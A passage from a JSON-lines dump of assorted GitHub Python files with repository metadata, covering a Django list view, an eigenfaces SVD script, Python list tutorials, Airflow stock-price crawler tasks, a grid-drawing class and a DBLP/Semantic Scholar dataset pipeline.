= Button(frame_btm, text=\"Select\", command = personal_rest)\r\n select_btn.grid(row=0, column=2, padx=20, sticky = 'e')\r\n\r\n next_btn = Button(gen_win, text = \"Generate Schedule\", command = check_restrictions)\r\n next_btn.grid(row =4, column = 0, sticky = 'e', padx = 20)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MaEyal/Work-Schedule","sub_path":"Generate.py","file_name":"Generate.py","file_ext":"py","file_size_in_byte":19919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19401052476","text":"import random\n\n# Mendeklarasikan variabel n sebagai input dengan tipe data integer\nn = int(input(\"Masukan nilai N: \"))\n# Perulangan untuk mencetak berapa baris yang dibuat berdasarkan variabel n\nfor i in range(n):\n # Mencetak perulangan, ditambah 1 setiap perulangan terjadi, untuk menjadikan baris pertama = 1,\n # dan mencetak angka acak dengan tipe data float.\n print(\"data ke\",i+1,\":\" , random.uniform(0, 0.5))\nprint(\"Selesai\")\n","repo_name":"antonmartinus72/labpy03","sub_path":"py/latihan1.py","file_name":"latihan1.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19774394793","text":"from django.db.models.functions import Lower\n\nfrom base.apps.github.models import User, Follower\n\nfrom views.base import ListView\nfrom ..mixins import UserMixin\n\nclass ListView(UserMixin,ListView):\n context_object_name = \"user_list\"\n template_name = \"user/following/user_list.html\"\n\n def get_queryset(self,**kwargs):\n qs = User.objects.filter(\n id__in=Follower.objects.filter(follower_id=self.github_user.id).values_list('user_id',flat=True)\n )\n q = self.request.GET.get('q','').strip()\n if q:\n qs = qs.filter(\n Q(**{'login__icontains':q}) |\n Q(**{'name__icontains':q}) |\n Q(**{'company__icontains':q}) |\n Q(**{'location__icontains':q})\n )\n return qs.order_by(Lower('login'))\n","repo_name":"andrewp-as-is/gist-list-django-server","sub_path":"views/user/following/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40967376966","text":"from image import color2gray, file2image, image2display\nfrom svd import factor\nimport os\nfrom math import sqrt\n\nimport sys\nsys.path.append('../vectors')\nsys.path.append('../matrix')\nfrom vec import Vec\nfrom mat import Mat\nfrom vecutil import list2vec\nfrom matutil import rowdict2mat, mat2coldict, coldict2mat\n\ndef load_images(path, n = 20):\n '''\n Input:\n - path: path to directory containing img*.png\n - n: number of images to load\n Output:\n - dict mapping numbers 0 to (n-1) to a list of rows,\n each of which is a list of pixel brightnesses\n '''\n return {i:color2gray(file2image(os.path.join(path,\"img%02d.png\" % i))) for i in range(n)}\n\ndef vec2image(vec, rowsCnt, colsCnt):\n indexes = sorted(list(vec.D))\n result = []\n for i in range(rowsCnt):\n result.append([])\n for j in range(colsCnt):\n result[-1].append(vec[i * colsCnt + j])\n\n return result\n\ndef find_centroid(images):\n return sum(images.values()) / len(images)\n\ndef center_images(images, centroid):\n return { key: (val - centroid) for key, val in images.items() }\n\ndef projected_representation(M, x):\n return M * x\n\ndef projection_length_squared(M, x):\n repr = projected_representation(M, x)\n return repr * repr\n\ndef distance_squared(M, x):\n repr = projected_representation(M, x)\n return x * x - repr * repr\n\ndef project(M, x):\n coordinates = projected_representation(M, x)\n return coordinates * M\n\nraw_images = load_images('./faces')\nrowsCnt = len(raw_images[0])\ncolsCnt = len(raw_images[0][0])\n\nimages = { key: list2vec([ el for row in image for el in row ]) for key, image in raw_images.items() }\ncentroid = find_centroid(images)\ncentered_images = center_images(images, centroid)\nM = rowdict2mat(centered_images)\n\nprint('Factoring...')\nU, E, V = factor(M)\nprint('Done')\nprint(len(U.D[0]), len(U.D[1]))\nprint(len(E.D[0]), len(E.D[1]))\nprint(len(V.D[0]), len(V.D[1]))\nprint(E[0,0], E[1,1], E[2,2], E[3,3])\n\north_basis = rowdict2mat({ key: vec for key, vec in mat2coldict(V).items() if key < 10 })\nprint(len(orth_basis.D[0]), len(orth_basis.D[1]))\nprint(len(centered_images[0].D))\n\nprint({ key: distance_squared(orth_basis, image) for key, image in centered_images.items() })\n\nprint('UNCLASIFIED')\nraw_images_uncl = load_images('./unclassified', 10)\nimages_uncl = { key: list2vec([ el for row in image for el in row ]) for key, image in raw_images_uncl.items() }\ncentered_images_uncl = center_images(images_uncl, centroid)\n\ndist = { key: distance_squared(orth_basis, image) for key, image in centered_images_uncl.items() }\nmax = max(dist.values())\ndist = { key: val * 100 / max for key, val in dist.items() }\n\nprint(dist)\n\nprint(\"Eigen Faces\")\n\nfor i in range(10):\n projection = project(orth_basis, centered_images_uncl[i]) + centroid\n image2display(vec2image(projection, rowsCnt, colsCnt))\n","repo_name":"AleksandrRogachev94/CodingTheMatrix","sub_path":"svd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39059507923","text":"import sys\nsys.stdin = open('input_russia.txt', 'r')\nN = int(input())\n\nfor tc in range(1, N+1):\n r, c = map(int, input().split())\n flag = []\n for _ in range(r):\n flag.append(list(map(str, input())))\n print(flag)\n","repo_name":"91hongppie/algorithm","sub_path":"190919/russia.py","file_name":"russia.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"25196444878","text":"# 使用list函数\nll = list('hello list')\nprint(ll)\n\n# 列表元素赋值 如 x[3]=5\nx = [1,2,3,4,5]\n# 改变列表第四个元素的值\nx[3] = 5\nprint(x)\n\n# 删除元素 del\nnames = ['zhangsan','lisi','wangwu','zhaoliu']\nprint(names)\n# 删除第三个元素\ndel names[2]\n# 最后列表长度变为3\nprint(names)\n\n\n# 分片赋值\nname = list('python')\nname[2:] = 'wr'\nprint(name)\n\n# 序列不等长分片替换\nname_re = list('perl')\n# 替换第一个元素后的所有内容\nname_re[1:] = list('ython')\nprint(name_re)\n\n# 插入新元素\nnum = [1,4,5]\n# 在第一个元素后插入新的元素\nnum[1:1] = [2,3]\nnum\nprint(num)\n\n# 给第一个和迪桑元素之间分片赋值一个空序列,即删除元素\nnum[1:3] = []\nnum\n[1, 4, 5]\n\n# 负数分片操作\nnum[-1:-1] = [5,5,5]\nprint(num)\n\n\n# 列表方法 追加内容\nlist_append = [1,2,3,4]\nlist_append.append(5)\nprint(list_append)\n\n# 统计列表中某个内容的词频\nnum.count(5)\n\n\n# 统计字母a出现的次数\nname = ['a','a','abf','ark','nhk']\n\nname.count('a')\n\n\n# extend 方法\na =[1,2,3]\nb = [4,5,6]\n# 将列表b追加在列表a后面\na.extend(b)\nprint(a)\n\n\n# index 方法\ncontent = ['where','who','lisi','cntent','who']\ncontent.index('who')\n\n# insert 方法\nnum = [1,2,5,6,7]\nnum.insert(2,3)\nprint(num)\nnum.insert(3,4)\nprint(num)\n\n\n# pop 方法\nx = [1,2,3]\nx.pop()\n3\nprint(x)\nx.pop()\nprint(x)\n\n# remove 方法\ncontent = ['where', 'who', 'lisi', 'cntent', 'who', 'who']\n# 移除了第一个匹配的元素\ncontent.remove('who')\nprint(content)\n\n\n# reverse 方法\nx = [1, 2, 3]\n# 元素反向存储\nx.reverse()\nprint(x)\n\n# sort 方法\nx = [2,3,5,6,1,4,7]\nx.sort()\nprint(x)\n\n# clear 方法\nlist1 = ['baidu', 'google', 12, 23]\nprint(list1)\nlist1.clear()\nprint(list1)\n\n# copy 方法\nlist1 = ['baidu', 'google', 12, 23];\nlist2 = list1.copy()\nprint(list2)\n","repo_name":"JustDoPython/python-100-day","sub_path":"day-008/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"zh","doc_type":"code","stars":699,"dataset":"github-code","pt":"19"} +{"seq_id":"13203141842","text":"import datetime\n\nfrom airflow.operators.python_operator import (\n PythonOperator,\n)\n\nfrom dataflow.backend import db\nfrom dataflow.crawler.taiwan_stock_price import (\n crawler,\n)\n\n\ndef crawler_taiwan_stock_price_twse(\n **kwargs,\n):\n # 由於在 DAG 層,設定 params,可輸入參數\n # 因此在此,使用以下 kwargs 方式,拿取參數\n # DAG 中 params 參數設定是 date (YYYY-MM-DD)\n # 所以拿取時,也要用一樣的字串\n params = kwargs[\"dag_run\"].conf\n date = params.get(\n \"date (YYYY-MM-DD)\",\n # 如果沒有帶參數,則預設 date 是今天\n datetime.datetime.today().strftime(\n \"%Y-%m-%d\"\n ),\n )\n # 進行爬蟲\n df = crawler(\n dict(\n date=date,\n data_source=\"twse\",\n )\n )\n # 資料上傳資料庫\n db.upload_data(\n df,\n \"TaiwanStockPrice\",\n db.router.mysql_financialdata_conn,\n )\n\n\ndef crawler_taiwan_stock_price_tpex(\n **kwargs,\n):\n # 註解如上\n params = kwargs[\"dag_run\"].conf\n date = params.get(\n \"date (YYYY-MM-DD)\",\n datetime.datetime.today().strftime(\n \"%Y-%m-%d\"\n ),\n )\n df = crawler(\n dict(\n date=date,\n data_source=\"tpex\",\n )\n )\n db.upload_data(\n df,\n \"TaiwanStockPrice\",\n db.router.mysql_financialdata_conn,\n )\n\n\ndef create_crawler_taiwan_stock_price_task() -> PythonOperator:\n return [\n # 建立任務\n PythonOperator(\n task_id=\"taiwan_stock_price_twse\",\n python_callable=crawler_taiwan_stock_price_twse,\n queue=\"twse\",\n provide_context=True,\n ),\n PythonOperator(\n task_id=\"taiwan_stock_price_tpex\",\n python_callable=crawler_taiwan_stock_price_tpex,\n queue=\"tpex\",\n provide_context=True,\n ),\n ]\n","repo_name":"FinMind/FinMindBook","sub_path":"DataEngineering/Chapter12/12.8/dataflow/etl/taiwan_stock_price.py","file_name":"taiwan_stock_price.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"9811511735","text":"#creating an empty list \nnumbers=[]\n\nn=int(input(\"Enter no of names u1 want to input \"))\n\nfor i in range(0,n):\n element=int(input())\n\n numbers.append(element)\n\n print(numbers)","repo_name":"thebinsohail/Python-Workspace","sub_path":"names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20750351104","text":"\nimport numpy as np\nfrom numpy import inf\nfrom ipycanvas import hold_canvas\nfrom findirection.envs.draw_grid import DrawGrid, Level\nfrom findirection.envs.grid_info import GridInfo\nfrom findirection.envs.arrows import Arrows\nfrom findirection.envs.directions import Direction\n\n\nclass DrawInfo():\n\n arrow_color = '#00008b' \n text_bg_color = 'rgba(40,40,40,0.7)' \n text_fg_color = '#fff' \n\n precision = 3 \n\n\n def __init__( self, draw_grid: DrawGrid, grid_info: GridInfo, **kwargs: dict ):\n \n self.grid = draw_grid.grid\n\n self.grid_info = grid_info\n\n self.draw_grid = draw_grid \n self.canvas = self.draw_grid.canvases[Level.Text]\n\n self.set_properties(kwargs.get('grid',None)) \n\n self.arrows = Arrows( draw_grid.cell_pixels, draw_grid.padding,length=24,width=7,height=11) \n\n\n def draw( self, props: dict ):\n\n if props is not None: \n self.precision = props.get('precision', self.precision)\n directions = props.get('directions',None)\n if directions is not None: \n self.process_direction_arrows(directions)\n self.process_direction_text(directions)\n\n self.process_text(props)\n\n self.process_info(props)\n\n if props.get('coords',False):\n self.draw_coordinates()\n\n\n\n def set_default_values(self,args): \n \n defaultargs = ((0,0),\"\",190,20)\n\n args += (None,)*len(defaultargs) \n\n args = tuple(map(lambda x, y: y if y is not None else x, defaultargs, args))\n return args\n\n\n def process_info(self,info):\n\n fg_color = 'black'\n bk_color = 'white'\n\n text = info.get('side_info',None)\n if text is not None: \n\n if self.draw_grid.side_panel is None:\n raise Exception(\"\\'side_panel\\' must be specified during grid creation to allow side panel text.\")\n\n if type(self.draw_grid.side_panel) == dict:\n fg_color = self.draw_grid.side_panel.get('text_fg','black') \n bk_color = self.draw_grid.side_panel.get('color','white') \n\n if self.draw_grid.side_panel:\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cx += self.draw_grid.width_pixels \n self.clear_info_panel_text( cx, cy, width, height, bk_color)\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cx += self.draw_grid.width_pixels \n self.info_panel_text(cx,cy,value,width,height,fg_color=fg_color,bk_color=bk_color) \n\n\n text = info.get('bottom_info',None)\n if text is not None: \n\n if self.draw_grid.bottom_panel is None:\n raise Exception(\"\\'bottom_panel\\' must be specified during grid creation to allow bottom panel text.\")\n\n if type(self.draw_grid.bottom_panel) == dict:\n fg_color = self.draw_grid.bottom_panel.get('text_fg','black') \n bk_color = self.draw_grid.bottom_panel.get('color','white') \n\n if self.draw_grid.bottom_panel:\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n cy += self.draw_grid.height_pixels \n self.clear_info_panel_text( cx, cy, width, height, bk_color)\n\n for item in text:\n (cx,cy),value,width,height = self.set_default_values(item)\n\n cy += self.draw_grid.height_pixels \n self.info_panel_text(cx,cy,value,width,height,fg_color=fg_color,bk_color=bk_color) \n\n\n def process_text(self,info):\n\n text = info.get('text',None) \n if text is not None:\n if isinstance(text,np.ndarray):\n self.draw_text_array(text)\n else:\n for (cx,cy),value in text: \n self.draw_cell_text(cx,cy,value)\n\n\n def process_direction_arrows(self,directions):\n\n arrows = directions.get('arrows',None)\n if arrows is not None:\n if isinstance(arrows,np.ndarray):\n self.draw_direction_arrow_array(arrows) \n else: \n\n if len(arrows) > 0 and (type(arrows[0][0]) == int): \n for (cx,cy) in arrows:\n direction = self.grid_info.get_directions(cx,cy)\n self.draw_direction_arrow(cx,cy,direction) \n\n else:\n for (cx,cy),direction in arrows: \n self.draw_direction_arrow(cx,cy,direction) \n\n\n def process_direction_text(self,directions):\n\n text = directions.get('text',None)\n if text is not None:\n if isinstance(text,np.ndarray):\n self.draw_direction_text_array(text) \n else:\n if len(text) > 0 and (type(text[0][0]) == int): \n for (cx,cy) in text:\n direction = self.grid_info.get_directions(cx,cy)\n self.draw_direction_text(cx,cy,direction) \n\n else:\n for (cx,cy),direction in text: \n self.draw_direction_text(cx,cy,direction) \n\n\n\n def set_properties( self, grid_props: dict ):\n\n if grid_props is not None:\n colors = grid_props.get('colors',None)\n if colors is not None: \n self.arrow_color = colors.get('arrows', self.arrow_color) \n self.text_fg_color = colors.get('text_fg', self.text_fg_color) \n self.text_bg_color = colors.get('text_bg', self.text_bg_color) \n\n\n \n def draw_direction_arrow( self, x, y, directions ): \n \n canvas = self.draw_grid.canvases[Level.Overlay]\n color = self.arrow_color \n padding = self.draw_grid.padding\n cell_pixels = self.draw_grid.cell_pixels\n px,py = self.draw_grid.grid_to_pixels( [x,y], padding, padding ) \n\n with hold_canvas(canvas): \n canvas.clear_rect(px,py,cell_pixels,cell_pixels)\n\n with hold_canvas(canvas): \n self.arrows.draw(canvas,px,py,directions,color) \n\n\n def draw_direction_arrow_array(self, directions: np.array):\n canvas = self.draw_grid.canvases[Level.Overlay] \n with hold_canvas(canvas): \n for y in range(directions.shape[0]):\n for x in range(directions.shape[1]):\n self.draw_direction_arrow( x, y, directions[y,x]) \n\n\n \n def draw_direction_text( self, x, y, direction ):\n self.draw_cell_text( x, y, Direction.get_string(direction) )\n\n\n def draw_direction_text_array(self,directions): \n for y in range(directions.shape[0]):\n for x in range(directions.shape[1]):\n if x != self.grid.end[0] or y != self.grid.end[1]: \n self.draw_direction_text( x, y, directions[y,x]) \n \n\n def draw_coordinates(self):\n with hold_canvas(self.canvas): \n for y in range(self.draw_grid.grid.height):\n for x in range(self.draw_grid.grid.width):\n self.draw_cell_text( x, y, f\"({x},{y})\") \n \n\n\n def draw_text_array(self,text):\n with hold_canvas(self.canvas): \n for y in range(text.shape[0]):\n for x in range(text.shape[1]):\n self.draw_cell_text( x, y, text[y,x]) \n\n\n def info_panel_text( self, x, y, text,width,height, \n fg_color='#000', \n bk_color='#fff',\n font='bold 14px sans-serif',\n text_align='left',\n text_baseline='top'): \n canvas = self.canvas\n canvas.save()\n with hold_canvas(canvas): \n canvas.fill_style = fg_color\n canvas.text_align = text_align\n canvas.text_baseline = text_baseline\n canvas.font = font\n canvas.fill_text(text, x, y)\n canvas.restore()\n\n\n def clear_info_panel_text( self, x, y, width, height, bk_color='#fff'):\n canvas = self.canvas\n with hold_canvas(canvas): \n canvas.fill_style = bk_color \n canvas.fill_rect(x,y-5,width,height) \n\n\n def draw_cell_text( self, x, y, value, color = None, back_color = None ): \n num_value = False\n if type(value).__name__.startswith('str'):\n if len(value) == 0:\n return\n elif isinstance(x, (int, float, complex)) and not isinstance(x, bool):\n num_value = True\n if np.isnan(value):\n return\n\n if self.grid.test_for_base_area(x,y): \n return\n \n if isinstance(value, float):\n if self.precision == 0:\n value = value.astype(int)\n else:\n value = round(value,self.precision) \n \n canvas = self.canvas\n padding = self.draw_grid.padding\n\n if color is None: color = self.text_fg_color\n if back_color is None: back_color = self.text_bg_color\n\n gx,gy = self.draw_grid.grid_to_pixels( [x,y], padding, padding ) \n cx,cy = self.draw_grid.get_center(gx,gy) \n\n bk_height = 20\n bk_width = 36\n\n if len(str(value)) > 4:\n bk_width += (len(str(value))-4) * 6\n\n if bk_width > (self.draw_grid.cell_pixels - 4):\n bk_width = (self.draw_grid.cell_pixels - 4)\n\n x_off = (bk_width//2)\n y_off = (bk_height//2)\n\n font_size = 14\n text_offset = 5\n if (num_value and self.precision > 1) or \\\n (not num_value and len(str(value)) >= 3):\n font_size = 12 \n text_offset = 4\n font_str = f\"bold {font_size}px sans-serif\"\n\n canvas.save()\n\n with hold_canvas(canvas): \n canvas.clear_rect(cx-x_off,cy-y_off,bk_width,bk_height) \n if back_color is not None:\n canvas.fill_style = back_color \n canvas.fill_rect(cx-x_off,cy-y_off,bk_width,bk_height) \n\n with hold_canvas(canvas): \n canvas.fill_style = color\n canvas.text_align = 'center'\n canvas.font = font_str\n canvas.fill_text(f\"{value}\", cx, cy+text_offset)\n\n canvas.restore()","repo_name":"arman-zhumakhan/arman-zhumakhan.github.io","sub_path":"projects/reinforcement-learning-project/findirection/envs/draw_info.py","file_name":"draw_info.py","file_ext":"py","file_size_in_byte":10717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10663816718","text":"import urllib.request\nimport shutil\nimport gzip\nimport json\nimport os\nimport re\nfrom collections import defaultdict\n\nfrom tqdm import tqdm\n\nfrom dblp_parser import parse_dblp, parse_dblp_person, get_dblp_country\n\nDATA_PATH = \"../data/\"\nDBLP_URL = 'https://dblp.org/xml/'\nSEMANTIC_SCHOLAR_URL = 'https://s3-us-west-2.amazonaws.com/ai2-s2-research-public/open-corpus/2020-01-01/'\n\n\ndef download_dblp() -> None:\n \"\"\"\n This functions downloads the DBLP XML and DTD.\n \"\"\"\n source_gz = DBLP_URL + 'release/dblp-2020-01-01.xml.gz'\n source_dtd = DBLP_URL + 'release/dblp-2019-11-22.dtd'\n target_gz = DATA_PATH + 'dblp.xml.gz'\n target_dtd = DATA_PATH + 'dblp-2019-11-22.dtd'\n\n print('Downloading file ' + source_gz)\n with urllib.request.urlopen(source_gz) as response, open(target_gz, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n print('Downloading file ' + source_dtd)\n with urllib.request.urlopen(source_dtd) as response, open(target_dtd, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n print('Download finish!')\n print()\n\n\ndef unzip_dblp() -> None:\n \"\"\"\n This functions unzip the DBLP dataset.\n \"\"\"\n source = DATA_PATH + 'dblp.xml.gz'\n target = DATA_PATH + 'dblp.xml'\n\n with gzip.open(source, 'rb') as f_in:\n with open(target, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n print()\n\n\ndef extract_publications() -> None:\n \"\"\"\n Reading the DBLP XML and parse it into a json file for further processing.\n \"\"\"\n source = DATA_PATH + 'dblp.xml'\n target = DATA_PATH + 'dblp.json'\n\n print('Parsing ' + source)\n parse_dblp(source, target)\n print('Parse finish! File dblp.json created!')\n print()\n\n\ndef extract_ai_publications(source: str = DATA_PATH + 'dblp.json',\n target: str = DATA_PATH + 'ai_dblp.json') -> set:\n \"\"\"\n Extracting the AI publications from the DBLP dataset.\n :param source: From where to read the pubs.\n :param target: Where to write the pubs to.\n :return: List of authors, which have published an AI publication\n \"\"\"\n source_venues = DATA_PATH + '../ai_venues.json'\n\n with open(source_venues, \"r\", encoding=\"utf-8\") as f:\n venues = json.load(f)\n venues = {a for b in venues.values() for a in b}\n\n authors = set()\n with open(target, \"w\", encoding=\"utf-8\") as out_f:\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n if line['booktitle']:\n curr_venue = line['booktitle'][0]\n elif line['journal']:\n curr_venue = line['journal'][0]\n else:\n continue\n curr_venue = re.sub(\" \\\\([0-9]+\\\\)$\", \"\", curr_venue)\n if curr_venue in venues:\n line['venue'] = curr_venue\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n authors.update(line['author'])\n print('Parse finish! File created!')\n print()\n return authors\n\n\ndef extract_persons(author_set: set) -> None:\n \"\"\"\n Extracting person information from DBLP and write it down.\n Note that we exclude person records that have the\n publtype disambiguation.\n :param author_list: A list of authors,\n which have published an AI publication\n \"\"\"\n source = DATA_PATH + 'dblp.xml'\n target = DATA_PATH + 'persons.json'\n\n print('Parsing ' + source)\n parse_dblp_person(source, target, author_set)\n print('Parse finish! File persons.json created!')\n print()\n\n\ndef parse_countries():\n \"\"\"\n Extracting countries for all authors in the AI DBLP.\n Countries are found using a possible country file.\n \"\"\"\n source_person = DATA_PATH + 'persons.json'\n source_country = DATA_PATH + '../poss_countries.txt'\n target = DATA_PATH + 'author_countries.json'\n\n get_dblp_country(source_person, source_country, target)\n print('Parse finish! File author_countries.json created!')\n print()\n\n\ndef extract_community_publications() -> None:\n \"\"\"\n Extracts all publications that have at least one author\n that we consider as an AI author.\n \"\"\"\n source = DATA_PATH + 'dblp.json'\n source_persons = DATA_PATH + 'persons.json'\n target_pubs = DATA_PATH + \"ai_community_dblp.json\"\n with open(source_persons, encoding=\"utf-8\") as file:\n persons = [json.loads(line) for line in file]\n # Put all author names into set\n authors = {}\n for person in persons:\n author_name = person[\"author\"]\n if isinstance(author_name, list):\n for a in author_name:\n authors[a] = person[\"key\"]\n elif isinstance(author_name, str):\n authors[author_name] = person[\"key\"]\n with open(target_pubs, \"w\", encoding=\"utf-8\") as out_f:\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n if \"author\" in line:\n matched_authors = [a for a in line[\"author\"]\n if a in authors]\n if matched_authors:\n line[\"ai_authors\"] = matched_authors\n line[\"ai_authors_keys\"] = [authors[author] for author\n in matched_authors]\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n print(\"Finished community_dblp.json file!\")\n print()\n\n\n# --- Helper for Extract Semantic scholar ---\ndef download_semantic_scholar_if_needed(semantic_scholar_path: str,\n default_count: int = 181) -> None:\n \"\"\"\n Helper file for match semantic scholar. Downloads the whole corpus.\n \"\"\"\n if not os.path.exists(semantic_scholar_path):\n os.mkdir(semantic_scholar_path)\n with urllib.request.urlopen(SEMANTIC_SCHOLAR_URL + \"manifest.txt\") as response:\n with open(semantic_scholar_path + \"manifest.txt\", 'wb') as fh:\n shutil.copyfileobj(response, fh)\n with open(semantic_scholar_path + \"/manifest.txt\", \"r\") as f:\n for line in tqdm(f, total=default_count):\n line = line.strip()\n with urllib.request.urlopen(SEMANTIC_SCHOLAR_URL + line) as response:\n with open(semantic_scholar_path + line, 'wb') as fh:\n shutil.copyfileobj(response, fh)\n\n\ndef get_doi(line) -> str:\n \"\"\"\n Get doi for a given line of the data, useful for semantic_scholar matching\"\n \"\"\"\n if \"ee\" in line:\n for x in line[\"ee\"]:\n if \"doi\" in x:\n return x.replace(\"https://doi.org/\", \"\")\n\n\ndef match_semantic_scholar() -> None:\n \"\"\"\n Match all the publications to Semantic Scholar. Also downloads Semantic Scholar\n if needed. Writes the matched data to ai_community_dataset.json\n \"\"\"\n source = DATA_PATH + 'ai_community_dblp.json'\n target = DATA_PATH + 'ai_community_dataset.json'\n semantic_scholar_path = DATA_PATH + \"semantic_scholar/\"\n download_semantic_scholar_if_needed(semantic_scholar_path)\n\n with open(source, \"r\", encoding=\"utf-8\") as f:\n pubs = f.readlines()\n pubs = [json.loads(x) for x in pubs]\n removed_indices = set()\n titles = defaultdict(list)\n [titles[x['title'].strip(\".\").lower()].append(i)\n for i, x in enumerate(pubs)]\n files = [file_path for file_path in os.listdir(semantic_scholar_path)\n if \"s2-corpus-\" in file_path]\n counter = 1\n with open(target, 'w', encoding=\"utf-8\") as out_f:\n for file_path in files:\n print(\"Reading file ... (\",\n str(counter), \"/\",\n str(len(files)), \")\")\n with gzip.open(semantic_scholar_path + file_path,\n 'rt',\n encoding=\"utf-8\") as in_f:\n for line in in_f:\n line = json.loads(line)\n curr_title = line['title'].strip().lower()\n if curr_title in titles:\n index = None\n for i in titles[curr_title]:\n pub = pubs[i]\n doi = get_doi(pub)\n if doi and \"doi\" in line and line[\"doi\"]:\n if doi == line[\"doi\"]:\n index = i\n break\n elif \"year\" in line and int(pub[\"year\"]) == int(line[\"year\"]):\n if line[\"venue\"] == \"ArXiv\":\n if pub[\"journal\"] and pub[\"journal\"][0] == \"CoRR\":\n index = i\n break\n elif pub[\"journal\"] and pub[\"journal\"][0] == \"CoRR\":\n continue\n else:\n index = i\n break\n if index and index not in removed_indices:\n if 'abstract' not in pub:\n pub['abstract'] = line['paperAbstract']\n if 'in_citations' not in pub:\n pub['in_citations'] = line['inCitations']\n if 'out_citations' not in pub:\n pub['out_citations'] = line['outCitations']\n if 'ss_id' not in pub:\n pub['ss_id'] = line['id']\n if 'doi' not in pub and 'doi' in line:\n pub['doi'] = [line['doi']]\n json.dump(pub, out_f)\n out_f.write(\"\\n\")\n removed_indices.add(index)\n counter += 1\n for i, pub in enumerate(pubs):\n if i not in removed_indices:\n json.dump(pub, out_f)\n out_f.write(\"\\n\")\n print(\"Finished. \")\n\n\ndef extract_german_ai(source: str = DATA_PATH + 'ai_community_dataset.json',\n target: str = DATA_PATH + 'german_ai_community_dataset.json') -> None:\n \"\"\"\n Extracts all publications in which at least one author is flagged as\n german.\n \"\"\"\n countries = DATA_PATH + 'author_countries.json'\n with open(countries, \"r\", encoding=\"utf-8\") as f:\n countries = f.readlines()\n countries = [json.loads(x) for x in countries]\n german_authors = [(x['author'], x['key']) for x in countries\n if \"Germany\" in x[\"countries\"]]\n german_names = {}\n for author, dblp_id in german_authors:\n if isinstance(author, list):\n for aut in author:\n german_names[aut] = dblp_id\n elif isinstance(author, str):\n german_names[author] = dblp_id\n with open(source, \"r\", encoding=\"utf-8\") as in_f:\n with open(target, \"w\", encoding=\"utf-8\") as out_f:\n for line in tqdm(in_f):\n line = json.loads(line)\n german_as = [auth for auth in line[\"ai_authors\"]\n if auth in german_names]\n if german_as:\n line[\"german_ai_authors\"] = german_as\n line[\"german_ai_authors_keys\"] = [german_names[name]\n for name in german_as]\n json.dump(line, out_f)\n out_f.write(\"\\n\")\n print(\"Finished extracting german AI publications. \")\n\n\ndef extrat_german_persons(person_source: str = DATA_PATH + 'persons.json',\n data_source : str = DATA_PATH + 'german_ai_community_dataset.json',\n target : str = DATA_PATH + 'german_persons.json') -> None:\n \"\"\"\n Writes all german authors into an author file.\n \"\"\"\n german_keys = set()\n with open(data_source) as file:\n for line in file:\n line = json.loads(line)\n german_keys.update(line[\"german_ai_authors_keys\"])\n with open(target, 'w') as out_file:\n with open(person_source) as in_file:\n for line in in_file:\n line = json.loads(line)\n if line[\"key\"] in german_keys:\n json.dump(line, out_file)\n out_file.write(\"\\n\")\n print(\"Finished extracting all german AI authors!\")\n\n\nif __name__ == '__main__':\n print('**** Starting pipeline process to create AI Datasets****')\n print()\n if not os.path.isdir(DATA_PATH):\n os.makedirs(DATA_PATH)\n\n print('Process 01 - Download dblp data')\n download_dblp()\n\n print('Process 02 - Unzipping dblp data')\n unzip_dblp()\n\n print('Process 03 - Create dblp.json')\n extract_publications()\n\n print('Process 04 - Create ai_dblp.json')\n author_set = extract_ai_publications()\n\n print('Process 05 - Create persons.json')\n extract_persons(author_set)\n\n print('Process 06 - Create author_countries.json')\n parse_countries()\n\n print(\"Process 07 - Create ai_community_dblp.json\")\n extract_community_publications()\n\n print('Process 08 - Extract Semantic scholar information for the AI community.')\n match_semantic_scholar()\n\n print('Process 09 - Extract Semantic scholar information for the AI data')\n # Just filter relevant publications from the AI community dataset, no\n # need for going throguh Semantic Scholar again.\n extract_ai_publications(source=DATA_PATH+'ai_community_dataset.json',\n target=DATA_PATH+'ai_dataset.json')\n\n print('Process 10 - Extract publications from German AI authors.')\n extract_german_ai()\n extract_german_ai(source=DATA_PATH + 'ai_dataset.json',\n target=DATA_PATH + 'german_ai_dataset.json')\n\n print('Process 11 - Extract German AI authors')\n extrat_german_persons()\n\n print('*** Pipeline process to create the data sets finished! ***')\n","repo_name":"TobiasKoopmann/ai-network","sub_path":"Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"15404750819","text":"import numpy as np\n\ndef geo2helio(r_so,rhat_ob,d):\n\t\"\"\"\n\tReturn the scalar multiplier for 'rhat_ob' that yields an 'r_so' of length 'd'\n\tNB: a=1 so we can omit it from 